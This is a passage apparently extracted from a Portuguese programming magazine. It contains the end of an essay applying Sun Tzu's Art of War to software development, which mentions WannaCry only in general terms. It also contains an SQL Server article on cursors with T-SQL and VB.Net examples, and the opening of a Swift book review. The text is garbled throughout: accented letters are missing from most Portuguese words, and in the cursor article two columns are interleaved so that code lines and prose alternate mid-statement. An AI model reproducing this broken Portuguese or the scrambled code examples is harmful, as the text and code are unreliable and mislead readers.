balham maioritariamente sozinhos, sentados frente a um com-
putador, com uma comunicao limitada com os restantes ele-
mentos da equipe! e tem efectivamente razo. No entanto,
isso no significa que no necessitem de uma boa liderana
quando esto envolvidos em projectos de equipe! Um Lder
no o que tradicionalmente se chama de chefe, pelo contr-
rio, algum que chama a si a responsabilidade de manter a
equipe no caminho certo, assegurar que a comunicao entre
todos eficiente, resolver qualquer desavena ou disputa entre
membros, definir prioridades, etc
Mais do que um ataque a um alvo, o que se preten-
de, um ataque ao problema propriamente dito! Ataque no
sentido de abordagem e aproximao! Neste caso poder-se-ia
dizer que uma cidade uma pea fundamental do projec-
toe a estratgia, ser a forma como o projecto ser aborda-
do, por forma a assegurar o sucesso do mesmo. As alianas
podem ser muitas coisas diferentes, por exemplo quando
para executar um projecto se tem de desenvolver uma alian-
a com outra equipe, que j detm conhecimento sobre um
aspecto, ou que tem aquele componente ou biblioteca que
pode ser fulcral para o projecto. Claro que sendo componen-
tes de software ou bibliotecas, que possam ser adquirveis, a
aquisio poder ser considerada uma forma de aliana! E
por fim o exrcito, que a equipe no seu todo, com todos os
seus elementos! A excepo que poder confirmar a regra,
ser o caso de uma equipe de uma pessoa s! certo que
em diversas situaes uma s pessoa far quase todos os
papis de uma equipe! Mas aqui existe algo que me recordo
de ler e gostaria de partilhar. Num texto que recentemente li,
um instrutor de uma unidade de topo, escreveu e cito
Tragam-me pessoas mentalmente fortes e robustas, que
fisicamente robustas, torno-as eu!. Ora eu no consegui
deixar de recordar essa leitura, porque efectivamente se os
elementos de uma equipe, ou at mesmo uma pessoa s, for
mentalmente forte, consegue ultrapassar virtualmente to-
programador no tanto a fora fsica que necessria,
afinal desenvolver um trabalho maioritariamente intelectual.
Em muitos destes casos aqueles que so mentalmente mais
fortes, so os que mais conseguem produzir e ultrapassar,
trabalhando sozinhos! O que de certa forma vai totalmente
de encontro aquilo que comum num programador!
Disposio do Exrcito ()
Segundo Sun Tzu, a importncia da disposio de um
exrcito na defesa de posies at ser capaz de avanar
com segurana, de especial relevncia. Uma das tarefas
mais importantes, nesta fase, ser o aproveitar de oportuni-
dades que se apresentem, sem criar oportunidades para o
inimigo.
Existem muitas abordagens possveis, para estabele-
cer um paralelo entre esta indicao da arte da guerra e o
desenvolvimento de software. Pessoalmente vou optar por
ilustrar, recorrendo a um evento que foi notcia no faz muito
tempo a esta parte. Ora vejamos, em tecnologia suposta-
mente no existem posies, ataques, defesas,
manobras, como existe num contexto blico convencional,
no entanto existem ataques informticos, que podem causar
srios e severos danos a sistemas inteiros. Neste aspecto
em concreto, todos aqueles que trabalham com um sistema
informtico so de certa forma um exrcito. Concretamen-
te, no faz muito tempo, ocorreu um ataque com um worm,
do tipo ransomware, baptizado de wannacry, que se propa-
gou rapidamente por diversos sistemas e provocou um
caos em muitos deles! Ora, esta situao, poderia ser com-
parada ao avano de um inimigo, no caso o malware, que
avanou sobre os sistemas, apoderou-se do sistema, propa-
gou-se e exigia o resgate pelos dados. Se de um lado da
paliada poderamos considerar que estivessem pessoas
mal intencionadas, do outro lado, estariam os programadores
30

e demais profissionais com responsabilidades, que tiveram a
dura tarefa de tentar mitigar e conter o avano do malware. Ok,
tambm contra-atacaram, por assim dizer, removendo-o dos
sistemas conforme foram conseguindo, e alguns, como o caso
das equipes que desenvolveram as correces para as falhas
exploradas pelo malware, contra-atacaram, corrigindo as falhas
que tornaram o dito ineficaz. Isto apenas serve para ilustrar
uma situao em concreto e para ilustrar o conceito. Muitos
casos como este, podero surgir, pois as falhas em software
so algo infelizmente comum, sendo de igual infelicidade a
inexistncia de uma cultura proactiva de desenvolvimento de
sistemas tendo em ateno a segurana do cdigo desenvolvi-
do.
Apesar de existirem imensas ferramentas livres que
permitem analisar cdigo, falta a cultura de o fazer e desenvol-
ver, mantendo a preocupao de produzir cdigo seguro, em
mente, durante o desenvolvimento.
No exemplo usado para ilustrar, poder-se-ia dizer que
os administradores de sistemas optaram por implementar polti-
cas que impediram a propagao do worm, como um exrcito
que firmou a posio, na impossibilidade de contra-atacar. Tal
aconteceu, parte-se do princpio, porque houve conhecimento
para agir de forma calma, estratgica e ponderada, observan-
do a oportunidade, sem permitir que fossem criadas oportuni-
dades ao opositor.
Foras ( ) rea, aproveitando a oportunidade, para ganhar vantagem,
Ora eis um tema interessante! No caso de um conflito
blico, tal como descrito na arte da guerra, o objectivo expli-
car o uso da criatividade e o tempo para criar momentum, num
exrcito. Como se est a falar de tecnologia, no um exrci-
to, mas sim um objectivo, ou seja ter sucesso!
Ora bem, a criatividade um factor base de sucesso,
alis ao longo da histria recente, temos visto como ideias ino-
vadoras e criativas tm aberto novos mercados, impulsionado
o desenvolvimento tecnolgico a criao de novas oportunida-
des, etc. Por exemplo, o lanamento do Apple 1, numa altura
em que os computadores no eram algo destinado a utilizado-
res comuns. A criatividade e a capacidade de pensar fora da
caixa, so factores indispensveis para o sucesso! Ainda que
por si s no sejam determinantes, e a juntam-se os restantes
ensinamentos! Quando se junta a criatividade com o momento
certo, avana-se a uma maior velocidade! Uma ideia que pode-
ria estar aparentemente condenada ao fracasso, ganha
momentum, ganha velocidade e torna-se um sucesso! Pode-
mos ver imensos exemplos assim no kickstarter, por exemplo,
onde ideias de entusiastas e makers, se tornam verdadeiros
sucessos, por terem aparecido na hora certa, no momento
certo, na altura certa!
A criatividade ser sempre o maior aliado de todos ns
na tecnologia! E essa ser a nossa fora!
Pontos fracos e pontos fortes ()
Como em tudo, a tecnologia no a excepo, existem
pontos fracos e pontos fortes. A forma e a rapidez com que so
Kernel Panic
A ARTE DA GUERRA E A TECNOLOGIA
equilibrados, ou desequilibrados para um dos lados, por
norma decisiva, num ou noutro sentido.
No contexto da tecnologia, as oportunidades apare-
cem com frequncia a partir de aberturas no ambiente exis-
tente, sejam elas alteraes ou circunstncias do ambiente,
ou sejam causadas por uma fraqueza relativa de uma de-
terminada tecnologia ou situao. Nesses casos a vantagem,
vem da fluidez com que se movimenta numa determinada
criar novas oportunidades ou at por exemplo um novo ecos-
sistema. Parece complexo, mas exemplificando, torna-se
simples! Por exemplo o advento do formato Mpeg Layer 3
(MP3), inicialmente causou uma enorme dor de cabea
industria musical, em parte por sua falta de fluidez de movi-
mentos. Ora vejamos, a popularizao desse formato, tornou
possvel e simples a transferncia de msicas em formato
digital com grande facilidade. Os suportes digitais eram
baratos e saam dos formatos de distribuio comuns, co-
mo as cassetes, cds vinil, etc Face a essa situao, servi-
os como o Napster, comearam a aproveitar o formato e a
sua popularidade, ainda que de forma completamente erra-
da, aproveitaram e ganharam velocidade. Do outro lado a
industria da msica, movimentou-se de forma rgida, perden-
do tempo. No meio deste contexto, uma aproximao quase
que improvvel, entre a indstria da msica e a Apple, gerou
aquilo que proporcionou um novo mundo. A Apple na altura
sob a liderana de Steve Jobs, aproveitou a oportunidade,
com uma fluidez atpica, lanou o seu servio de vendas de
msica, a iTunes Store, comercializou o seu equipamento
destinado a reproduzir msica no formato digital o iPod e em
certa medida revolucionou a forma como se consome msi-
ca. No entanto na altura a Apple era uma empresa de hard-
ware e software, com a sua prpria linha de produtos, o seu
ecossistema, a sua viso das coisas! No entanto a forma
com conseguiu ser fluida nos movimentos, gerou um dos
maiores sucessos tecnolgicos que ainda agora muito re-
cordado e aclamado.
Portanto, a fluidez de movimentos em resposta as
mudanas, so essenciais para criar oportunidades, aprovei-
tar oportunidades e converter fraquezas em foras para mo-
31
Kernel Panic
A ARTE DA GUERRA E A TECNOLOGIA
ver e ganhar vantagem, desiquilibrando a balana em nosso
favor!
Manobras Militares ()
Apesar de Sun Tzu se ter focado no aspecto blico,
podemos perfeitamente seguir os ensinamentos mas orientan-
do-os a outros aspectos! Um conflito directo, acarreta sempre
riscos e perdas associadas. At porque num conflito, nenhum
dos lados tem uma vitria sem falhas, pois a prpria definio
de conflito define a existncia de perdas de ambos os lados!
Sendo que o lado que efectivamente derrotado, ter a maior
perda. Vejamos, por exemplo um gestor de projectos, pode ver
-se forado a uma confrontao com a sua equipe, ou com
elementos da sua equipe, por uma quantidade relativamente
grande de motivos, sejam eles tempos de execuo, mtodos
de executar determinada tarefa, etc A primeira perda, ser o
tempo despendido na discusso. Quando o tempo um factor
crtico, despender tempo com discusses que no sejam plau-
sveis de produzir um bom resultado, acaba redundando num
desgaste de tempo. Por outro lado o atrito gerado por uma
discusso, origina desgaste, pode perfeitamente originar mal
estar e no longo percurso, provocar uma perda ainda maior.
Outros exemplos poderiam ser dados, por exemplo o confronto
entre equipes que trabalham no mesmo projecto, em partes
diferentes do projecto, etc
Todos os conflitos so complexos e sempre que poss-
vel devem ser evitados. No entanto de grande importncia,
saber como vencer, quando forado a um conflito. Existem
muitas formas de se vencer um conflito argumentativo, mas
como diz o velho ditado, a vitria comea quando se decide
ouvir atentamente. Ouvir os argumentos e opinies dos outros
o primeiro passo para se compreender e entender se real-
mente a vantagem vem de vencer o argumento ou de conciliar
as posies, fazendo cedncias. Existe muito boa documenta-
o sobre este tema e este kernel panic j se faz longo, portan-
to tenta-se resumir um pouco o tema. Um passo para vencer
uma contenda, ser sempre definir uma inteno emotivamen-
te positiva, mostrando-se sempre uma inteno emocional fo-
cada no pretender a paz e pretender ajudar a outra parte. Partir
do principio que a outra parte est sempre na melhor das inten-
es, ser paciente e tentar mover a situao para a frente, em
vez de permanecer no mesmo ponto, ser sempre benfico! A
escolha de palavras fulcral! Num argumento manter a outra
parte numa considerao positiva, mostrando respeito mtuo,
mesmo discordando com a opinio, mostrar respeito pela mes-
ma, ser um caminho para o sucesso. E por fim, gerir as reac-
es! No deixar que o comportamento da outra parte, altere o
nosso comportamento! Podia dizer em tom de brincadeira, no
deixar que o ponto e vrgula que nos escapa, nos cause irrita-
o, mas no fundo se esse ponto e vrgula nos escapa, por-
que nos esquecemos de o colocar no stio certo!
Em suma, se entrarmos num conflito, no tendo alterna-
tiva, melhor ser recorrer a todas as tcnicas que nos permi-
tam vencer!
Variaes e adaptabilidade () segurana. Uma das grandes tarefas na hora de mitigar um
Como j foi dito, a flexibilidade uma das maiores
vantagens! Nos textos de Sun Tzu, a flexibilidade focada
no aspecto blico, nomeadamente na capacidade de um
exrcito responder s mudanas. Ora bem a tecnologia est
em constante mudana! A sobrevivncia em certa medida
depende da adaptabilidade e da flexibilidade de se adaptar,
seja a uma nova tecnologia, a uma nova arquitectura, a um
novo standard, a um novo conjunto de protocolos, a novas
circunstncias, etc Como referido anteriormente no exem-
plo do mpeg layer 3 (mp3), a capacidade de se adaptar s
constantes mudanas de circunstncias um factor crucial
no sucesso! Usando alguns dos tpicos anteriormente apre-
sentados, por exemplo face a um confronto, possivelmente
originado por mudanas de circunstncia, nada melhor que
adaptar mudana contornar o confronto e seguir em frente!
Na tecnologia as mudanas cada vez mais ocorrem a veloci-
dades e frequncias maiores! Por exemplo, hoje em dia as
redes sociais so uma mudana de circunstncia a que os
jogos digitais tm de se adaptar! Noutros tempos multi-
player, era basicamente um ecr divido a meio!
Hoje em dia isto impensvel a menos que se este-
ja a falar de retro gamming! E efectivamente no jogamos
Lotus Chalange! Isto porque houveram mudanas de cir-
cunstncia e o modelo de multi-player (multi-jogador), com o
ecr dividido, entre os dois, deixou de ser vivel, at porque
praticamente todos os equipamentos esto ligados em rede,
logo um ecr, para cada jogador, cada um no seu equipa-
mento! Poderia enumerar mais exemplos de mudanas de
circunstncia, no entanto no valer a pena continuar, dei-
xando apenas os exemplos de situaes em que as circuns-
tncias mudaram e a adaptabilidade, pode ditar o sucesso,
face mudana!
Movimento e Desenvolvimento de Tropas (
)
No livro, esta seco especialmente dedicada
avaliao das intenes das outras partes. Na tecnologia, se
focarmos especialmente nos aspectos relacionados com
ataque a um sistema, passa por antecipar o que o agressor
possa ter por objectivo fazer, por forma a impedir o sucesso,
32

ou mesmo at tentar reproduzir os passos seguidos pelo
agressor, para melhor entender o caminho seguido para o invi-
abilizar, em futuras incurses. O mesmo se pode aplicar, por
exemplo na hora de analisar malware. Por exemplo, a quando
da deteco de um novo malware, perceber o que ele faz, no
apenas descompilar e ler o cdigo, mas tambm perceber a
sua origem, quais os objectivos de quem o escreveu, avaliar as
intenes de quem o escreveu, etc
O avaliar as intenes de outros, pode tambm aplicar-
se por exemplo na hora de agregar um novo elemento a uma
equipe! Quando no se conhece o elemento, poder ser consi-
derado um risco a adio de um elemento a uma equipe! Po-
dero as intenes, no ser as melhores, poder ter objectivos
diferentes dos da restante equipa, etc. A avaliao de inten-
es acaba sendo um processo constante e importante! qua-
se como se faz no trnsito, quando se pretende fazer uma ma-
nobra e um outro veiculo, no utiliza os sinais de marcha para
indicar as suas intenes! Cabe ao condutor tentar avaliar e
prever as intenes do outro condutor! Sim, porque no so-
mos autmatos e no comunicamos constantemente, como o
caso dos carros autnomos! Logo temos de avaliar constante-
mente! No ligou os indicadores de mudana de direco, mas
aproximou-se do eixo da via? Ser que vai virar ? Mas no
comunicou (ligou os piscas) a inteno de o fazer! Qual ser a
inteno ? um exemplo caricato, mas um exemplo real, que
se vive no trnsito, todos os dias!
Terreno ( )
Eis algo complexo! O que se pode considerar terreno
em tecnologia, Bem, talvez as arquitecturas de hardware, uma
vez que o software depende do hardware para viver, talvez
o mercado onde se coloca um produto, talvez o sistema opera-
tivo para o qual se desenvolve? A linguagem de programao
em que se desenvolve um produto? A framework escolhida?
Bem, se qualquer um destes elementos puder ser considerado
o terreno, podemos considerar que cada terreno tem as suas
vantagens e desvantagens, sendo a vantagem a ponderao
das mesmas! No poderia deixar de passar este item sem dar
um exemplo, que pode ser considerado por muitos, antigo,
obsoleto, mas no deixa de ser um exemplo. Em tempos, o
System 7 e posteriores (System 8 e System 9), da Apple Com-
puter, eram totalmente incompatveis com os IBM PC compat-
veis , os PCs como eram e ainda so conhecidos. A arquitec-
tura de processador era diferente dos pc compativeis, o softwa-
re era destinado apenas a Macs, etc No entanto muito soft-
ware foi desenvolvido para esses sistemas, apostando num
sistema que na altura muitos achavam que acabaria sendo
destinado apenas a entusiastas e afins. A verdade que o
sistema evoluiu, o System 9.x deu lugar ao Mac OS X, durante
um lapso de tempo, o software escrito para System 9, poderia
ser executado em OS X e at certo ponto a vantagem foi man-
tida. No entanto, a escolha de um terreno, no caso uma plata-
forma de hardware e software, poderia ter sido desastrosa, na
medida em que o hardware PC Compatvel teve sempre um
mercado mais amplo e o software para PC Compatvel, nos
diversos sistemas operativos disponveis para a plataforma,
mas em particular para Windows, mantiveram e ainda mantm
a liderana irrefutvel no mercado! Caso a profecia de muitos
Kernel Panic
A ARTE DA GUERRA E A TECNOLOGIA
se tivesse concretizado todo esse desenvolvimento teria
perdido competitividade, e custado bastante mais para portar
e manter. Logo at a escolha do que pode ser considerado
terreno, sempre um factor de elevada importncia! Talvez
no isolada, mas conjugada com outros factores!
Os nove campos de batalha ()
Em tecnologia podemos certamente considerar que
existem bem mais do que apenas nove campos de batalha,
no entanto preferiria no focar este tpico em arquitecturas,
modelos de desenvolvimento, plataformas, etc Mas voltar
um pouco aquilo que acontece antes de comearmos a de-
senvolver e a criar! A educao!
Segundo um estudo publicado, existem nove factores
chave para o sucesso da educao em tecnologia. O primei-
ro diz que a tecnologia deve estar integrada nas aulas. Ora
bem, nos dias de hoje isto mais possvel do que nunca,
dada a massificao do uso da tecnologia! Logo este ser
um ponto facilmente ultrapassado, na hora de escolher onde
estudar! No segundo ponto do mesmo estudo dito que os
responsveis pelo ensino devem definir tempo para aprendi-
zagem profissional e colaborao entre educadores. Bem,
aqui entramos um pouco no campo da poltica! Mas ser fcil
ao observar a oferta formativa, ver qual est mais actualiza-
da, consequentemente aquela que mais aposta na formao
dos docentes! Seguindo para o ponto terceiro, o estudo diz
que os alunos devem utilizar a tecnologia para colaborar!
Creio que as ferramentas colaborativas, esto mais dispon-
veis que nunca! Desde o guithub ao Ondrive, passando por
Google docs entre tantas outras, colaborar nunca foi to fcil
como agora! Bastar incentivar a us-las! Passando para o
quarto ponto, diz que a tecnologia deve ser integrada no
ncleo do curriculum, nos vrios nveis de educao, pelo
menos uma vez por semana ou mais! Bem, isto poder no
ter tanto a ver com aquilo que diz respeito a um programa-
dor, mas certamente se for um programador que simultanea-
mente seja educador (professor, formador, etc), ter certa-
mente a oportunidade para dar o seu contributo neste ponto,
para o que considerado um dos factores do sucesso! Qua-
tro j foram e vem o quinto ponto! Ora bem, neste dito que
devem existir avaliaes formativas, on-line! Muita gente
estar a pensar no famoso Moodle! Bem, outras plataformas
usam exactamente o mesmo sistema, por exemplo o Cour-
sera, entre outras! Mais do que avaliar de forma bitolada,
estas avaliaes permitem a quem est a aprender poder ter
uma percepo concreta das suas dificuldades proporciona-
do a oportunidade de dedicar mais tempo aquilo que se estu-
da! Por exemplo no caso de ensino de programao, ter a
possibilidade de colocar o cdigo numa plataforma on-line,
ver se cumpriu os requisitos e em caso contrrio ter alguma
explicao adicional, poder ser uma grande vantagem na
aquisio de conhecimento! J s faltam quatro, e vamos no
ponto sexto! Ora neste o estudo diz que quanto menor o
rcio estudantes para computadores, melhor! Eu diria que o
ideal, seria cada um ter o seu disponvel! At porque muito
se aprende praticando! Parafraseando um amigo meu,
mesmo a copiar, aprendes a digitar. Logo se cada um tiver
o seu, mais fcil ser manter o foco, manter a ateno e
33
Kernel Panic
A ARTE DA GUERRA E A TECNOLOGIA

praticar cada vez mais, ao seu ritmo, sua velocidade! No
stimo ponto sugerida a realizao de visitas de estudo vir-
tuais! Bem, o virtual vago, mas certo ser que com a tecno-
logia evoluda como est, a realidade aumentada ajuda a dis-
ponibilizar por exemplo contedos adicionais interactivos. Por
outro lado, imaginando um pouco, no seria engraado ver
como o cdigo executado pelo hardware, nas entranhas
do mesmo ? Quase seguindo o exerccio de imaginao de
alguns livros, como o Viagem ao Centro da Terra, mas no
caso, seria mais uma viagem ao centro do cpu, vendo os bits
e bytes, registers e demais circuitos a actuarem, a iluminarem
quando so utilizados! Eis algo que seria uma boa visita de
estudo virtual! E na recta final vamos ao ponto oitavo! Nesse
ponto sugerido que os alunos usem motores de busca! Eu
diria que j existe um verbo intransitivo, com significado ainda
que limitado, para significar isto mesmo! O verbo googlar, que
de acordo com o dicionrio um verbo transitivo e intransitivo!
Procurar ou pesquisar no motor de busca Google. "googlar", in
Dicionrio Priberam da Lngua Portuguesa [em linha], 2008-
2013, https://www.priberam.pt/dlpo/googlar [consultado em 29-
05-2017]. . Apenas falta o ltimo ponto desta lista, onde se
pode ler que os responsveis, devem ensinar e encorajar as
prticas recomendveis para a implementao da tecnologia!
Aqui no existe muito a dizer! A menos que sejamos ns os
responsveis neste processo!
Atacando com Fogo ()
Neste ponto Sun Tzu, refere as vantagens e desvanta-
gens do uso de cada recurso, em cada situao especfica! Em
tecnologia, o mesmo se pode aplicar, mas os recursos so
muito mais vastos e os constrangimentos muito mais frequen-
tes o que causa uma infinidade de variantes de casa situao!
Por exemplo, isto pode ser aplicado escolha de um algoritmo
para resolver uma determinada situao, sendo o algoritmo o
recurso e a situao o problema que se pretende resolver! Po-
deria ser por exemplo uma framework, o recurso e um projecto
a situao! A escolha dos recursos deve ser sempre pondera-
da e adequada situao ou ao problema, tendo em conta os
eventuais constrangimentos de tempo, recursos, etc que
envolvem toda a situao.
Inteligncia e Espionagem ()
Por fim o dcimo terceiro! Inteligncia e Espionagem
no devem ser confundidas. Neste captulo encontramos
uma frase muito interessante que diz e cito Por isso, ape-
nas o governante esclarecido e o sbio general que usar a
mais alta inteligncia do exrcito para fins de espionagem e,
assim, conseguem grandes resultados. Os espies so um
elemento muito importante na guerra, porque neles depende
a capacidade do exrcito de se mover. Isto pode ser inter-
pretado como a necessidade de ter ferramentas de monitori-
zao e bibliotecas destinadas a logging. Apesar de poder
parecer para muitos que o desenvolvimento de software
termina quando se tem uma release estvel, isso pode no
ser bem assim! O software est sempre a evoluir, que seja
para corrigir bugs, quer seja para adicionar novas funcionali-
dades, ou aumentar a eficincia ou o desempenho. Neste
aspecto a melhor fonte de informao, so as ferramentas
de monitorizao e os logs da aplicao que nos mostram
onde a aplicao poder estar a perder performance, ou a
causar um erro, que funcionalidades so mais utilizadas,
quais so os erros mos comuns, etc Se considerarmos
que nem sempre possvel reproduzir todos os erros, em
ambiente controlado, estas ferramentas, acabam sendo a
melhor fonte de informao para os developers melhorarem
as aplicaes, bem como fazerem as actualizaes necess-
rias em tempo oportuno!

Em concluso, pode-se dizer que a Arte da guerra

superou o passar dos tempos, resistiu a sculos de existn-
cia e tornou-se aplicvel a tantas reas distintas, como aque-
las em que a pretendermos observar!

AUTOR
Escrito por Antnio C. Santos

Programar criar um novo mundo escrevendo cdigo, cumprindo os mais elementares desgnios da
vida, aprender, ensinar, criar, partilhar, melhorar e seguir. Formou-se no Instituto Politcnico de Viana
do Castelo. Membro da Comunidade Portugal-a-Programar desde Agosto de 2007, tambm membro da
Sahana Software Foundation, onde Programador Voluntrio desde 2012, actualmente exerce funes
de mentor voluntrio na plataforma MOOC Coursera . Twitter:@apocsantos

34
 SQL Curtas
Cursores: O Bom, o Mau e o SQL...

O Bom );
GO
Uma simples query SQL permite visualizar informao
(retornada em formato tabular), sendo essa informao lida por -- De seguida inserimos alguns registos
um qualquer programa (app, site, etc.). Mas o que acontece se INSERT INTO Cats
quisermos que o prprio motor SQL trate a informao? (CatID, CatName, CatYear)
VALUES
Consideremos uma tabela de colaboradores duma em- ( 1, 'Grumpy Cat', 2012),
( 2, 'Schrody (Schrdinger''s cat)', 1935), /*
presa. Todos os meses temos que processar o ordenado. Para The name is correct and at the same time is in-
isso executamos algo (e.g.um stored procedure), que tem toda correct - until someone asks the cat! */
a "magia" e complexidade l dentro. Mas precisamos de execu- ( 3, 'Garfield', 1978),
( 4, 'Hobbes', 1985),
tar tantas vezes quantos registos tivermos. Isso no possvel ( 5, 'Mr.Bigglesworth', 1997),
com um simples SELECT. ( 6, 'Sylvester', 1941),
( 7, 'Simba', 1994),
Aqui entram os cursores. So uma figura demnica mui- ( 8, 'Tigger', 1928),
to mal tratada, mas que se virmos bem so at bastantes sim- ( 9, 'Heathcliff', 1973),
ples. (10, 'Simon''s Cat', 2008),
(11, 'Spot (Data''s cat)', 1991),
O que faz ento um cursor? Um cursor executa uma (12, 'Top Cat', 1961),
(13, 'Fofinha', 2001),
certa query e permite ao programa ler o resultado registo a (14, 'Leoa (the ''Mini-Cat'')', 2008),
registo (sequencialmente) num ciclo, eventualmente fazendo (15, 'Pantyusha (Panteleymon)', 1900);
mltiplas operaes com cada registo. GO

O Mau -- A curiosidade matou o gato...

SELECT * FROM Cats;
Nem tudo bom em cursores, claro. A sintaxe "feia" GO
um dos problemas, mas quanto a isso nada a fazer (hashtag
-- De seguida criamos um SP para executar
#ComeECala). CREATE PROCEDURE USP_CatActions
@CatID INT,
Outra, mais grave, a dificuldade do motor de SQL em @CatName NVARCHAR(64) AS
optimizar o pedido. Numa query SQL fcil optimizar o acesso Print (CONCAT('A fazer coisas felinas com
e obter os dados da forma mais eficiente globalmente. O pro- "', @CatName, '" (ID=', @CatID, ')...'));
-- etc...
blema que os cursores pedem um resultado inicial e depois GO
cada operao executada em cada registo retornado tratada
independentemente. -- Executar registo a registo to fcil
EXEC USP_CatActions @CatID = 1, @CatName =
Da a recomendao de no usar cursores em consul- 'Grumpy Cat';
tas em que uma simples (ou complexa) query resolva o proble- GO
ma, mas nas situaes de execuo individual (registo a regis-
to) de tarefas no h outra opo. O resultado da execuo do stored procedure :

A fazer coisas felinas com "Grumpy Cat" (ID=1)...

O SQL
Se estivssemos num programa, e.g. site, podera-
Um exemplo vale mil palavras... Vamos usar SQL Server e
mos usar cdigo em C# ou neste caso em VB.Net para ob-
VB.Net mas ser semelhante para outros motores de bases de
ter os registos e process-los um a um
dados e outras linguagens.
Option Explicit On
Option Strict On
Comeamos por criar alguns objectos na base de dados e tes-
Imports System.Data.SqlClient
t-los.
Module Felino
-- Comeamos por criar uma tabela simples Sub Main()
CREATE TABLE Cats ' Escolher uma connection string para o
( servidor
CatID INT NOT NULL PRIMARY KEY, ' (neste caso liga-se ao servidor
CatName NVARCHAR(64) NOT NULL, "LOCALHOST"
CatYear INT NOT NULL, ' e base de dados "PROGRAMAR")

35
SQL Curtas
CURSORES: O BOM, O MAU E O SQL...

Dim ConnStr As String = "Data Source A fazer coisas felinas com "Simon's
=LOCALHOST; " _ Cat" (ID=10)...
+ "Initial A fazer coisas felinas com "Spot (Data's
Catalog=PROGRAMAR; " _ cat)" (ID=11)...
+ "Integrated
Security=True" Como possvel ver, pede-se a query inicial e depois
por cada registo retornado, executa-se algo. Repetir at no
' Escolher a query para obter dados
Dim SQL As String = "SELECT CatId, haver mais registos.
CatName " _
+ "FROM Cats
" _
+ "WHERE CatYear > Um cursor tem uma sintaxe muito parecida.
1990 " _
+ "ORDER BY CatName;" Nota: para simplificar o cdigo SQL em baixo, no foi coloca-
do tratamento de erros (e.g. bloco TRY-CATCH), mas sem-
Try pre importante validar.
' Abrir ligao ao servidor
Dim conn As New SqlConnection(ConnStr)
conn.Open()
-- Para executar algo sobre cada registo precisa-
' Definir novo pedido mos dum cursor...
Dim comm As New SqlCommand(SQL, conn) -- Nota: executar o resto deste cdigo em bloco
comm.CommandType = CommandType.Text
comm.Prepare() -- Comeamos por declarar as variveis dos valores
a ler do cursor (campos na prtica)
'Obter os dados DECLARE @ID INT;
Dim dr As SqlClient.SqlDataReader DECLARE @Name NVARCHAR(64);
dr = comm.ExecuteReader()
-- De seguida declaramos o cursor juntamente com a
'Ciclo registo a registo (pede um query que vai usar
registo de cada vez) DECLARE catsor CURSOR FOR
While (dr.Read()) SELECT CatId, CatName
Dim CatID As Integer FROM Cats
Dim CatName As String WHERE CatYear > 1990
ORDER BY CatName;
CatID = CType(dr.Item("CatID"),
Integer) -- Abrir o cursor (executar a query em cima e pre-
CatName = CType(dr.Item("CatName"), parar-se para ler)
String) OPEN catsor;

' Incluir operaes aqui... -- Tentar obter o primeiro registo (2 campos para
Console.WriteLine("A fazer coisas dentro das 2 variveis respectivas)
felinas com " _ FETCH FROM catsor INTO @ID, @Name;
+ """" + CatName
+ """" _ -- Agora ciclar por todos os registos se o registo
+ " (ID=" _ obtido for vlido (se existe)
+ CatID.ToString WHILE (@@FETCH_STATUS = 0)
_ BEGIN
+ ")...") -- Fazer coisas
' Etc.. EXEC USP_CatActions @CatID = @ID, @CatName =
End While @Name;
Catch ex As SqlException -- Etc.
Throw '...
Catch ex As Exception -- Tentar obter o prximo registo
Throw '... FETCH NEXT FROM catsor INTO @ID, @Name;
End Try END;

Console.ReadLine() 'Aguentar os felinos -- Arrumar a caixa da areia

para ver o resultado CLOSE catsor;
End Sub DEALLOCATE catsor;

End Module
O resultado da execuo do bloco idntico ao anterior,
mas neste caso feito em SQL com um cursor.
Um dos maiores dios de estimao aos cursores o
O resultado da execuo do programa em VB.Net : facto de o FETCH ser escrito duas vezes (que grave quan-
do por exemplo vamos buscar muitos campos e te-
A fazer coisas felinas com "Fofinha" (ID=13)... mos que repetir um FETCH com muitas variveis).
A fazer coisas felinas com "Grumpy Cat" (ID=1)...
A fazer coisas felinas com "Leoa (the 'Mini- Felizmente h workarounds
Cat')" (ID=14)...
A fazer coisas felinas com
"Mr.Bigglesworth" (ID=5)...
A fazer coisas felinas com "Simba" (ID=7)...

36
 SQL Curtas
CURSORES: O BOM, O MAU E O SQL...

-- Exemplo com cursor usando apenas um FETCH

pectivas)
-- Nota: executar o resto deste cdigo em bloco FETCH NEXT FROM catsor INTO @ID, @Name;
-- Comeamos por declarar as variveis dos valores -- Caso no tenha mais registos, sai do WHILE
a ler do cursor (campos na prtica) IF (@@FETCH_STATUS <> 0) BREAK;
DECLARE @ID INT;
DECLARE @Name NVARCHAR(64); -- Fazer coisas
EXEC USP_CatActions @CatID = @ID, @CatName =
-- De seguida declaramos o cursor juntamente com a @Name;
query que vai usar -- Etc.
DECLARE catsor CURSOR FOR END;
SELECT CatId, CatName
FROM Cats -- Arrumar a caixa da areia
WHERE CatYear > 1990 CLOSE catsor;
ORDER BY CatName; DEALLOCATE catsor;
-- Abrir o cursor (executar a query em cima e pre- O resultado da execuo do bloco idntico ao anterior,
parar-se para ler)
OPEN catsor; mas fica com o cdigo simplificado.

-- Agora ciclar por todos os registos Finalmente, para apagar os objectos criados:
-- Este um ciclo infinito WHILE (1=1), com um
BREAK no interior
WHILE ('Cursor' <> '666') -- Assim mais interes-
sante
BEGIN DROP TABLE Cats;
-- Tentar obter o primeiro/prximo registo DROP PROCEDURE USP_CatActions;
-- (2 campos para dentro das 2 variveis res-

AUTOR
Escrito por Andr Melancia

Independent Developer/DBA/Consultant. Microsoft Certified Trainer (MCT) focusing on SQL Server, Azu-
re and IoT. 17+ years' fun developing information and multimedia systems, DBA, project and IT manage-
ment. PowerShell Portugal, IT Pro Portugal and IoT Portugal communities organiser. IPv6 Por-
tugal, DNSSec Portugal and Windows Development Portugal online communities moderator. Actively
volunteering, organising, speaking or just participating at community meetings and events like SQLSatur-
days, SQLBits, SQLRelay, Maker Faire Lisbon, Arduino/Genuino Day Lisbon, Global Azure Bootcamp
Lisbon, etc. Proud uncle and food devouring expert, with dangerous ussy cat as companion.

Go to http://Andy.PT and you'll know the same as the NSA...

37
Media Partners da Revista PROGRAMAR

Anlises
C# 6 - PROGRAMAO COM PRODUTIVIDADE
Bases de Dados e Geolocalizao
 Review
Desenvolvimento em Swift para iOS
Ttulo: Desenvolvimento em Swift para
iOS
Autores: Lus Marcelino | Catarina
Silva
Editora: FCA - Editora de Informtica
Pginas: 264
ISBN: 978-972-722-859-1
Formato: soft-cover
Nesta edio vamos fazer a review do Livro
Desenvolvimento em Swift para iOS escrito por Lus Marce-
lino e Catarina Silva, ambos professores no Politcnico de
Leiria e co-autores do livro Desenvolvimento em iOS iPho-
